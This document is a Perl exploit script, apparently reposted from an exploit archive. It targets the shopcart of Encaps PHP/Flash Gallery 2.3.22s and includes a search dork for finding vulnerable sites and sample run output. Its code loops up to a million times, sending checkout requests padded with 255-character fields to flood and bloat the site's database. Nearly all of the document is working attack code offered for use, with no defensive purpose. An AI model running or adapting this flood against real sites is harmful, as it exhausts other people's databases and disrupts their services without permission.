Hi guys, #ref: http://www.milw00rm.com/exploits/5179 #!/usr/bin/perl -w #Title : Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit #Vendor : http://www.encaps.net #Download : http://sourceforge.net/projects/encapsnet/files/ #Author : ZoRLu / zorlu@milw00rm.com #Website : milw00rm.com / milw00rm.net / milw00rm.org #Twitter : https://twitter.com/milw00rm or @milw00rm #Test : Windows7 Ultimate #Date : 19/12/2014 #Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others #BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) #Dork : intext:"encaps php gallery" #Note : must be shopcart is enable #Desciption : its be Turkish because i dont know very well speak english #Script uzerinden begendiginiz herhangi bir urunu siparis ederken (mesela: http://server/path/shopcart.php?action=add&item_id=1) #sizlerden isim, e-posta ve adres bilgileri isteniyor. Bu bilgilerin kontrolu ise (http://server/path/admin/shopcart.php) #linki uzerinden yapilmakta yani girdiginiz her turlu veri burada kayit altina aliniyor haliyle veritabanina yaziliyor ve bu islem #yapilirken kod filtreleme disinda hic bir veri giris kontrolu yapilmiyor. Evet item_name, address_name vb. parametreler icin karakter #sinirlamasi yapilmis fakat bu verilerin ardarda gonderilmesini engelleyen herhangi bir uygulama soz konusu degil, istedigimiz kadar #veriyi araliksiz gonderip veritabanina buyuk bir yukleme yapabiliyoruz haliyle veritabanini sisiriyoruz yani database puffing up ;) # #perl encaps.pl # #Usage: perl encaps.pl http://server /script_path/ #Exam1: perl encaps.pl http://server /test/ #Exam2: perl encaps.pl http://server / # #perl encaps.pl http://server /test/ #[+] Sending: 1 #[+] Sending: 2 #[+] Sending: 3 #[+] Sending: 4 #[+] Sending: 5 #[+] Sending: 6 #[+] Sending: 7 #[+] Sending: 8 #[+] Sending: 9 #[+] Sending: 10 #[+] Sending: 11 #Terminating on signal SIGINT(2) (i stopped exploit for stop ctrl+c please) #You can look here for your send: http://server/test/admin/shopcart.php # use HTTP::Request::Common qw( POST ); use LWP::UserAgent; use IO::Socket; use strict; use warnings; sub hlp() { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\nUsage: perl $0 http://server /script_path/ \n"; print "Exam1: perl $0 http://server /test/ \n"; print "Exam2: perl $0 http://server / \n"; } if(@ARGV != 2) { hlp(); exit(); } my $ua = LWP::UserAgent->new; my $url = $ARGV[0]; my $path = $ARGV[1]; my $puffing = $url.$path."shopcart.php?action=add"; my $address = "A" x 255; #its limit =\ its for my $itemname = "A" x 255; #its limit =/ more loading at database my $req = POST $puffing, [ payer_business_name => 'TestName', #for loading its a little payer_email => 'salla@google.com', #for loading its a little address_name => $address, #its 255 character for more loading item_number1 => '1', #its item number not null item_name1 => $itemname, #its 255 character for more loading amount1 => '', #its maybe null because limit a little quantity1 => '', #its maybe null because limit a little mc_gross_1 => '', #its maybe null because limit a little num_cart_items => '1', #its not null action => 'checkout_submit', #its action and not null ]; my $resp = $ua->request($req); unless ($resp->is_success) { print "[-] HTTP POST error code: ", $resp->code, "\n"; print "[-] HTTP POST error message: ", $resp->message, "\n"; } else { my $resp = $ua->request($req); my $message = $resp->decoded_content; my $regex = "Thank you for your interest, we will contact you soon."; unless ($message =~ /$regex/) { print "[-] Exploit Failed\n"; } else { for (my $i=1; $i<=1000000; $i++) { my $resp = $ua->request($req); print "[+] Sending: $i\n"; } } }